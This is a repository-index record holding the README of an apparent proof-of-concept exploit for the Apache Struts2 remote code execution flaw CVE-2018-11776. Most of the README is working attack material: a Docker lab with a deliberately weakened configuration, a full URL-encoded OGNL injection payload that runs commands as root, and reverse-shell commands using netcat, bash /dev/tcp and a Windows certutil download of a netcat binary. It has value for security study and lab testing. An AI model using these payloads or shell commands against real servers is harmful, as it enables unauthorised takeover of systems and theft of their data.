{"id":22280898,"url":"https://github.com/hook-s3c/cve-2018-11776-python-poc","last_synced_at":"2025-08-13T07:15:33.114Z","repository":{"id":178199520,"uuid":"145985371","full_name":"hook-s3c/CVE-2018-11776-Python-PoC","owner":"hook-s3c","description":"Working Python test and PoC for CVE-2018-11776, includes Docker lab","archived":false,"fork":false,"pushed_at":"2018-08-25T02:14:49.000Z","size":12407,"stargazers_count":125,"open_issues_count":1,"forks_count":50,"subscribers_count":10,"default_branch":"master","last_synced_at":"2025-07-28T19:45:41.493Z","etag":null,"topics":["cve-2018-11776","exploit","java","poc","struts2"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hook-s3c.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2018-08-24T11:53:02.000Z","updated_at":"2024-10-09T18:44:30.000Z","dependencies_parsed_at":null,"dependency_job_id":"4856b475-efa7-4ae7-b7c2-4ca885b76375","html_url":"https://github.com/hook-s3c/CVE-2018-11776-Python-PoC","commit_stats":null,"previous_names":["hook-s3c/cve-2018-11776-python-poc"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/hook-s3c/CVE-2018-11776-Python-PoC","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hook-s3c%2FCVE-2018-11776-Python-PoC","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hook-s3c%2FCVE-2018-11776-Python-PoC/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hook-s3c%2FCVE-2018-11776-Python-PoC/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hook-s3c%2FCVE-2018-11776-Python-PoC/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hook-s3c","download_url":"https://codeload.github.com/hook-s3c/CVE-2018-11776-Python-PoC/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hook-s3c%2FCVE-2018-11776-Python-PoC/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":270202597,"owners_count":24544366,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-13T02:00:09.904Z","response_time":66,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2018-11776","exploit","java","poc","struts2"],"created_at":"2024-12-03T16:09:40.830Z","updated_at":"2025-08-13T07:15:33.094Z","avatar_url":"https://github.com/hook-s3c.png","language":"Python","readme":"# CVE-2018-11776-Python-PoC\nhook-s3c (github.com/hook-s3c), @hook_s3c on twitter\n\nWorking Python test and PoC for CVE-2018-11776, originally appearing on;\nhttps://github.com/hook-s3c/CVE-2018-11776-Python-PoC\n\n## What's going on?\n\nMan Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request.\n\nVersions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.\n\nDefault configuration is not vulnerable, but if misconfigured... F.\n\n## Set up your docker instance\n\nexploit will work fine with the docker container build for cve-2017-5638\n(struts2-showcase-2.3.12)\n```\n$ docker pull piesecurity/apache-struts2-cve-2017-5638\n$ docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638\n```\n\n## Set up your weakened configuration\n\n```\n$ apt-get install vim\n$ vim /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml \n```\nadd the configuration below;\n```\n\u003caction name=\"help\"\u003e\n            \u003cresult type=\"redirectAction\"\u003e\n                    \u003cparam name=\"actionName\"\u003edate.action\u003c/param\u003e\n            \u003c/result\u003e\n    \u003c/action\u003e\n```\nand also;\n```\n\u003cstruts\u003e\n  \u003cconstant name=\"struts.mapper.alwaysSelectFullNamespace\" value=\"true\" /\u003e\n```\n\nrestart your tomcat and/or container\n```\n$ /usr/local/tomcat/bin/shutdown.sh\n```\n\n## Verify that target is vulnerable\n\ntest the url to see if a redirect and evaluation occurs;\n\nhttp://0.0.0.0:32771/${2+2}/help.action \u003e http://0.0.0.0:32771/4/date.action\n\nwith the test script;\n```\n$ ./exploitS2-057-test.py http://0.0.0.0:32771/showcase.action\ntesting the url for exploit; http://0.0.0.0:32771/${12612+24867}/help.action\nURL http://0.0.0.0:32771/showcase.action s2-057 CVE-2018-11776 is vulnerable!\n```\n\n## Execute commands PoC\n\n```\n$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'id'\n[Execute]: id\n[Url]: http://0.0.0.0:32771/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action\n\n\n\nuid=0(root) gid=0(root) groups=0(root)\n```\n\n\n## Reverse shell\n\nget your box ready to accept the reverse shell;\n```\n$ netcat -lvp 31337\n```\n\nrun the script;\n```\n# you'll want to install netcat\n$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'apt-get install netcat -y'\n\n# now pop that shell \n$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'netcat -e \"$SHELL\" 172.17.0.1 31337'\n```\nreplace 32771 with your exposed container port\n\n## Updated method via Bash, forward-slashes now supported.\n\n```\n$ netcat -lvp 31337\n```\n\n```\n$ ./exploitS2-057-cmd.py 0.0.0.0:32771 \"/bin/bash -i \u003e\u0026 /dev/tcp/172.17.0.1/31337 0\u003e\u00261\"\n```\n\n## Windows reverse shell (untested)\n\n\n```\n# grab netcat binary\n# https://stackoverflow.com/questions/28143160/how-can-i-download-a-file-with-batch-file-without-using-any-external-tools\n\n$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'certutil.exe -urlcache -split -f \"https://yourhostingservice.1337/files/netcat.exe\" nc.exe'\n\n# execute\n$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'nc.exe 172.17.0.1 31337 –e cmd.exe'\n```\n\n-----------------\n# Debug hell (notes)\n\nAll requests with a forward-slash (/) will fail because Tomcat actively blocks these, you may need to work around this, for example using environment variables for /bin/bash as $SHELL in the example above.\n\n- https://stackoverflow.com/questions/9719224/coding-forward-and-backward-slashes-in-tomcat-7\n- http://engineering.widen.com/blog/tomcat-slashes/\n\nWith this in mind, the windows /c flag will not work as expected. I've only tested this on the docker container.\n\n## Update \n\nThanks to @Menin_TheMiddle for showing that the forward-slash issue can be resolved, the code now supports forward-slashes and so a reverse shell without netcat via bash is now also possible, also now supports Windows instances (untested).\n\n# Mitigation\n\nPatch your Struts, or simply don't use it. \n\nI guess you can always sell identify fraud products if you happen to have a breach and all your customer details are leaked! (you know who you are, absolute scum)\n\n# Credit\n\nThanks to ;\n\n- Man Yue Mo, Semmle for disclosing the vulnerability (https://semmle.com/news/apache-struts-CVE-2018-11776)\n- piesecurity for the Dockerfile lab and example of OGNL payload (https://github.com/piesecurity/apache-struts2-CVE-2017-5638)\n- xfox64x for the write-up on the method (https://github.com/xfox64x/CVE-2018-11776)\n- jiguang7 for the test (https://github.com/jiguang7/CVE-2018-11776)\n- @Menin_TheMiddle for the writeup (https://www.secjuice.com/apache-struts2-cve-2018-11776/) and putting me in my place :) code now finally supports windows and bash reverse shell\n\n# Greetz\n\nshout out to vap0rsquad!!! sH3llG0d - Willow - D@3M0¢π1 - n4t4s - 23pieces\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhook-s3c%2Fcve-2018-11776-python-poc","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhook-s3c%2Fcve-2018-11776-python-poc","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhook-s3c%2Fcve-2018-11776-python-poc/lists"}